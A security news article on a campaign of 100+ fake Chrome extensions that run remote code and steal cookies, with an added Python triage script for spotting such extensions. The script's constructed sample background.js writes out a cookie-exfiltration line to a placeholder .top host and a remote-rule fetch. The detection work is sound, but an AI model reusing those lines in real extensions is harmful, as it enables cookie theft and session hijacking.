Over 100 Malicious Chrome Extensions Found: Masquerading as AI Tools, VPNs, and Crypto Apps
Over the past year, an unidentified cybercriminal has created more than 100 fake Chrome extensions with dual functions—tracking users and stealing access tokens. These extensions evade Google’s security by remotely injecting malicious scripts after installation.
According to a new report from DomainTools, this is part of a large, ongoing campaign that tricks users into downloading supposedly “free” VPNs, AI tools, crypto apps, SEO utilities, and other Chrome extensions.
Figure 1. 100+ Malicious Chrome Extensions Found: AI, VPN & Crypto Scams
As of now, many of the identified malicious extensions remain available on the Chrome Web Store (see Figure 1).
According to the report, these extensions often have dual functionality—they perform as expected on the surface but secretly connect to malicious servers to transmit user data, receive commands, and run arbitrary code.
Examples of these deceptive extensions include Deepseek AI, DeBank, Manus AI, Eart VPN, Eelephant, Forti VPN, and SiteStats.
In this campaign, the attacker begins by setting up fake websites that mimic legitimate services, tools, or assistants. These lure sites then redirect users to the Chrome Web Store to install the corresponding malicious extension.
The cybercriminal has also built a network of API servers to manage the extensions—issuing commands, collecting data, and maintaining control. All of the identified servers use a .top top-level domain.
DomainTools researchers warn that the malicious extensions can execute arbitrary code from attacker-controlled servers on any site a user visits. This enables a range of threats, including credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, phishing via DOM manipulation, and attempts to steal browser cookies—potentially leading to full account compromises.
Separately, Cybernews has highlighted the risk of Chrome extensions demanding excessive permissions. Just over a month ago, another 58 malicious extensions targeting users were uncovered.
How the Hacker Evades Google’s Security Measures
Chrome is moving to a new extension platform called Manifest Version 3 (MV3), aimed at improving security and efficiency by disallowing remotely hosted code. However, the malicious extensions identified in the campaign violate this principle by fetching and executing remote code from attacker-controlled servers.
According to researchers, these extensions often function as advertised but are granted excessive permissions, enabling them to run arbitrary code on every site a user visits. Despite differing in name and appearance, they share similar code structures and backend infrastructure.
In one example, a “background.js” script was used to apply “declarativeNetRequest” rules fetched from the attacker's server. This method allows the extension to alter network traffic—such as blocking, redirecting, or modifying headers—after installation, effectively bypassing Google’s review process. This tactic can be exploited for ad injection, malicious redirects, or user tracking.
Researchers uncovered that the background script of the malicious Chrome extensions was sending encrypted system data—such as language, memory, CPU cores, timezone, IP address, and country code—to attacker-controlled servers, while also receiving potentially executable code and rules in return.
The content script, injected into all websites visited by the user, executed arbitrary code retrieved from these servers. One example, the Forti VPN extension, offered limited VPN functionality using a hardcoded third-party API key, but its primary function was to connect to a malicious backend via WebSocket [1]. Once activated, it would steal all browser cookies, compress and encode them in Base64, and send them to the attacker. It could also act as a proxy, routing traffic through hacker-controlled servers.
The extensions had hardcoded API servers in files like background.js and used JSON Web Tokens (JWT) and SHA-256 for authentication. The threat actor behind the campaign used common infrastructure patterns, including the NameSilo registrar, Cloudflare for hosting, and SSL certificates from WE1, along with consistent Facebook Tracker IDs as part of their ecosystem.
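The indicators described in the preceding paragraphs (a content script matching every site, declarativeNetRequest rules fetched at runtime, hardcoded .top endpoints, cookies read and Base64-encoded) can be turned into a static triage check over an unpacked extension. The following is an added example written for this article, not code from the report or from any of the extensions; the regexes, the .top heuristic and the sample manifest and background script are constructed assumptions.

```python
import json
import re

# Indicators taken from the campaign description above. The regexes, the
# .top heuristic and the constructed sample files are my own (assumption);
# this is a triage aid for unpacked extensions, not a verdict.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
DNR_RULES_RE = re.compile(r"declarativeNetRequest\.updateDynamicRules")
REMOTE_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|WebSocket)\s*\(")
TOP_HOST_RE = re.compile(r"(?:wss?|https?)://([a-z0-9.-]+\.top)\b", re.I)
COOKIE_RE = re.compile(r"chrome\.cookies\.getAll|document\.cookie")

def triage_extension(manifest_json: str, scripts: dict) -> list:
    """manifest_json: text of manifest.json; scripts: {filename: JS source}."""
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    findings = []
    if BROAD_HOSTS & perms:
        findings.append("manifest: host permissions cover every site")
    for cs in m.get("content_scripts", []):
        if BROAD_HOSTS & set(cs.get("matches", [])):
            findings.append(f"manifest: content script {cs.get('js')} runs on all sites")
    for name, src in scripts.items():
        hosts = sorted(set(h.lower() for h in TOP_HOST_RE.findall(src)))
        if hosts:
            findings.append(f"{name}: hardcoded .top endpoint(s) {hosts}")
        # MV3 forbids remote code; rules pulled from a server and applied at
        # runtime are the review bypass described above.
        if "declarativeNetRequest" in perms and DNR_RULES_RE.search(src) and REMOTE_RE.search(src):
            findings.append(f"{name}: applies declarativeNetRequest rules fetched at runtime")
        if COOKIE_RE.search(src) and "btoa(" in src:
            findings.append(f"{name}: reads cookies and Base64-encodes them")
    return findings

# Constructed sample files (not from any real extension) to exercise the check.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "permissions": ["declarativeNetRequest", "cookies"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background.js"},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
})
SAMPLE_BACKGROUND = """
const API = "wss://api-placeholder.top/ws";  // constructed placeholder domain
fetch("https://rules-placeholder.top/rules.json").then(r => r.json())
  .then(rules => chrome.declarativeNetRequest.updateDynamicRules({addRules: rules}));
chrome.cookies.getAll({}, c => new WebSocket(API).send(btoa(JSON.stringify(c))));
"""
```

Run `triage_extension(SAMPLE_MANIFEST, {"background.js": SAMPLE_BACKGROUND})` against an unpacked extension's files; an empty list means none of these particular indicators were seen, not that the extension is safe.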
Although some of these extensions have been removed from the Chrome Web Store, the delay between discovery and removal continues to put users at risk. Researchers urge users to install extensions only from trusted developers, review permissions carefully, and be cautious of lookalike tools. Antivirus solutions may help detect threats more quickly.
References:
- https://cybernews.com/security/hundred-chrome-extensions-stealing-user-data/
Cite this article:
Janani R (2025), Over 100 Malicious Chrome Extensions Found: Masquerading as AI Tools, VPNs, and Crypto Apps, AnaTechMaz, pp. 233